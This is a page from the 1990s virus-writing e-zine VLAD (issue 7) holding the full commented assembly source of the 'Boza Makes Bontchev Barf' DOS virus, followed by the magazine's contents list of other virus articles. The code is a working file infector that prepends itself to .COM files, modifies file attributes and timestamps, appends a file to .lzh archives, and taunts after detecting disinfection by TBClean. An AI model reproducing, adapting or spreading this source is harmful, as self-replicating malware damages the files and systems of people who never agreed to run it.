Virus Labs & Distribution
VLAD #7 - Boza Makes Bontchev Barf Virus

; "Boza makes Bontchev barf"
;                   by Metabolis.
; When the virus is tbcleaned and run it will print either..
;      "Bad command or filename"                ; if port 40h holds a value
;                                               ; lower than 0d2h.
;       or
;      "Call this virus what you will.          ; if it's higher.
;       Boza still makes Bontchev barf :P"
; The virus will then fix itself so if the user is stupid enough
; to run it again it will keep infecting.  (Well, in a sense they're
; not stupid, after all.. the file will work again, damn destructive
; tbclean :)
; If there are any .lzh files in the current directory the virus will
; add a small com file to them all.  (note: it doesn't check if the
; archives have already been added to, so it just adds the file again,
; no harm.. just takes up more precious hdd space I guess)
; Files larger than 0fab0h, smaller than 1002, CO as the first two
; characters, starting with 0e9h,00,00 or with numbers in the filename
; won't be infected.
; I'm sure there is a lot of code here that could be optimized.
; It's lucky I don't care :)
; a86 bmbb.asm

        org     100h

        db      0e9h,00,00                      ; jump along

        mov     bx,0FECEh                       ; initialize tbclean check

        mov     word ptr [101h],(die-star)-3    ; move the address of "die"
        mov     ax,100h                         ; to 101h then jump there.
        jmp     ax
                                                ; it then jumps to die.

        db      " 'Boza makes Bontchev Barf' by Metabolis "

        ; when the virus is tbcleaned (tbclean never did handle
        ; prependers correctly.) it gets written back to disk
        ; with the jump to die still at 100h, so if bx ain't FECE
        ; it has been cleaned.

counter db      00h

        mov     word ptr[101h],0000h            ; fix initial jump.

        cmp     bx,0FECEh                       ; we been cleaned?
        je      keepgoin                        ; no, keep going.

        in      al,40h                          ; grab us a number
        cmp     al,0d2h                         ; compare al to 210
        jb      badcom                          ; below?

        mov     dx,offset barf                  ; boza makes bontchev barf.
        jmp     print

        mov     dx,offset badcomm               ; bad command or filename.

        mov     ah,9                            ; display stuph from ds:dx
        int     21h

        push    ds                              ; we'll be needing this

        mov     si,word ptr[2ch]                ; get env seg from psp

        push    si
        pop     ds                              ; change ds to env seg

        xor     bp,bp

        mov     bx,word ptr ds:[bp]             ; grab a byte from env
        inc     bp
        cmp     bx,0000h
        jne     loopme
        inc     bp
        mov     bx,word ptr ds:[bp]
        cmp     bx,0001h
        jne     loopme

        inc     bp
        inc     bp

        mov     ax,3d01h                        ; open the current file
        mov     dx,bp
        int     21h

        xchg    ax,bx                           ; the usual.

        pop     ds

        mov     ah,40h                          ; write 3 bytes that will
        mov     cx,3                            ; fix the virus back up.
        mov     dx,star
        int     21h

        mov     ah,3eh                          ; close file
        int     21h

        mov     ax,4c00h                        ; time to retreat.
        int     21h


        mov     byte ptr[counter],00h

        mov     ah,1Ah
        mov     dx,word ptr[total]              ; relocate the dta
        int     21h                             ; to the very end of the virus
                                                ; (plus infectee length)
        mov     ah,4eh
        mov     cx,7                            ; find first file
        mov     dx,offset fmask
        int     21h
        jnc     checks                          ; no error? check it out.
        jmp     returnhost

        mov     bp,word ptr[total]              ; put filesize in cx
        mov     cx,word ptr[bp+1ah]

        cmp     cx,0fab0h                       ; too big?
        ja      findn

        cmp     cx,1002                         ; too small?
        jb      findn

        cmp     word ptr[bp+1eh],'OC'           ;
        je      findn

        mov     si,bp
        mov     cx,8
        xor     ax,ax

        cmp     byte ptr [si+1eh],30h           ; this routine checks to
        jb      cont                            ; see if there are any
        cmp     byte ptr [si+1eh],39h           ; numbers in the filename
        ja      cont                            ; of the infectee.
        jmp     findn

        inc     si
        loop    looptime

        mov     ax,4301h
        lea     dx,[bp+1eh]                     ; fix up the attributes
        mov     cx,20h                          ; to nothing incase the
        int     21h                             ; file is read only or
        jc      findn                           ; something.

        mov     ax,3d02;                        ; open file for read/write
        lea     dx,[bp+1eh]
        int     21h
        jnc     fixhandle
        jmp     fn

        xchg    bx,ax

        mov     ah,03fh                         ; read 3 bytes from file
        mov     cx,3                            ; put in temp
        mov     dx,offset temp
        int     21h

        cmp     word ptr[temp],00e9h            ; file infected?
        je      fn

        mov     cx,word ptr[temp]
        add     cl,ch
        cmp     cl,167                          ; an incognito EXE?
        je      fn

        jmp     pushups

        jmp     findnext                        ; damn jumps > 128 :|

        mov     ax,4200h                        ; seek to the beginning
        cwd                                     ; of the file
        xor     cx,cx
        int     21h

        call    sof

        mov     ah,03fh
        mov     cx,en-star                      ; read start of infectee
        mov     dx,word ptr[total]              ; and put it after the
        add     dx,42                           ; relocated DTA
        mov     si,dx
        int     21h

        mov     cx,word ptr[total]              ; could probably push
        mov     word ptr[temp],cx               ; word ptr [total] heh

        mov     cx,word ptr[bp+1ah]
        add     cx,100h                         ; fix up the new total
        add     cx,(en-star)                    ; file length of the infectee
        mov     word ptr[total],cx              ; (+100h)

        call    sof

        mov     ah,40h
        mov     cx,en-star                      ; write virus to file
        mov     dx,star
        int     21h

        mov     cx,word ptr[temp]               ; restore total
        mov     word ptr[total],cx

        mov     ax,4202h                        ; seek to end of file
        call    sof+3

        mov     ah,40h                          ; write the overwritten
        mov     cx,en-star                      ; infectee code to the
        lea     dx,[si]                         ; end of the file.
        int     21h
        jc      fn

        inc     byte ptr[counter]               ; increment that infect cntr.

        mov     cl,byte ptr[bp+15h]             ; restore original
        lea     dx,[bp+1eh]                     ; attributes to the file
        mov     ax,4301h
        int     21h

        mov     cx,word ptr[bp+16h]             ; restore date and time
        mov     dx,word ptr[bp+18h]
        mov     ax,5701h
        int     21h

        mov     ah,3eh                          ; close file
        int     21h

        cmp     byte ptr[counter],1             ; infected a file?
        je      returnhost                      ; yea, we out.

        mov     ah,4fh                          ; find another file.
        int     21h
        jc      returnhost
        jmp     checks                          ; open it up


        mov     ah,4eh
        mov     cx,7                            ; find first lzh
        mov     dx,offset fmask2
        int     21h
        jc      audi

        mov     ax,3d01h
        lea     dx,[bp+1eh]                     ; open it up for write axs
        int     21h

        xchg    ax,bx                           ; fix the file handle

        mov     ax,4201h                        ; goto eof-1
        mov     dx,word ptr[bp+1ah]
        dec     dx
        xor     cx,cx
        int     21h

        mov     ah,40h                          ; write the lzh header
        mov     cx,enddump-dump
        mov     dx,offset dump
        int     21h

        mov     ah,3eh                          ; close the file
        int     21h

        mov     ah,4fh                          ; find another file.
        int     21h
        jc      audi                            ; error? .. we out
        jmp     openlzh

        mov     ah, 1ah
        mov     dx, 80h                         ; DTA back to 80h
        int     21h

        mov     si,offset proced
        mov     di,word ptr[total]              ; move the return to host
        mov     cx,proceden-proced              ; code to the end of
        rep     movsb                           ; everything so it doesn't
        mov     ax,word ptr[total]              ; get overwritten.
        jmp     ax

        mov     si,word ptr[total]
        sub     si,en-star                      ; put everything back at
        mov     di,100h                         ; 100h like it should be.
        mov     cx,en-star
        rep     movsb

        mov     ax,100h                         ; ribbit.
        jmp     ax

barf    db      "Call this virus what you will.",0dh,0ah
        db      "Boza still makes Bontchev barf :P$"

db 31,68,45,108,104,53,45,98,0,0,0              ; a useless com file
db 109,0,0,0,118,90,91,32,32,1,6
db 66,66,46,67,79,77,24,170,77,0,0
db 0,99,82,118,174,39,3,52,69,6,127
db 240,96,208,247,128,204,12,79,185,191,195
db 77,93,80,188,189,225,67,11,79,124,30
db 227,56,0,20,184,187,245,221,57,235,200
db 199,186,135,111,132,82,2,149,108,146,150
db 60,218,70,210,92,204,140,163,65,237,156
db 225,125,177,35,189,173,35,83,26,185,24
db 141,13,5,115,111,231,84,144,223,70,238
db 139,227,11,252,154,39,168,118,158,192,0

badcomm db      "Bad command or file name",0dh,0ah,"$"

fmask   db      "*.c?m",00h
fmask2  db      "*.lzh",00h
temp    db      00,00,00
total   dw      ((en-star)*2)+100h


host:                                           ; our little host program
        mov     ah,9
        mov     dx,0109h
        int     21h
        int     20h
        db      "Did you really want to run this?",0dh,0ah
        db      "Metabolis - 1996","$"



ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


No Flags
ARTICLE.2_2       Goodbye Virus
ARTICLE.2_3       Boot Sector Tutorial
ARTICLE.2_4       STAOG Linux Virus
ARTICLE.2_5       Pow Boot Virus
ARTICLE.2_6       Wulf2
ARTICLE.2_7       Tbscan Internals


VLAD Viruses
ARTICLE.3_2       TVIR600
ARTICLE.3_3       Vecna Boot Virus
ARTICLE.3_4       Padania Virus
ARTICLE.3_5       HooDoo Virus
ARTICLE.3_6       Pandemonium Virus
ARTICLE.3_7       Black Lotus


Zip Virus
ARTICLE.4_2       Archive Infect
ARTICLE.4_3       Virstop Article
ARTICLE.4_4       Boza Makes Bontchev Barf Virus
ARTICLE.4_5       Killer Virus
ARTICLE.4_6       Muraroa End
ARTICLE.4_7       Mages Fury

About VLAD - Links - Contact Us - Main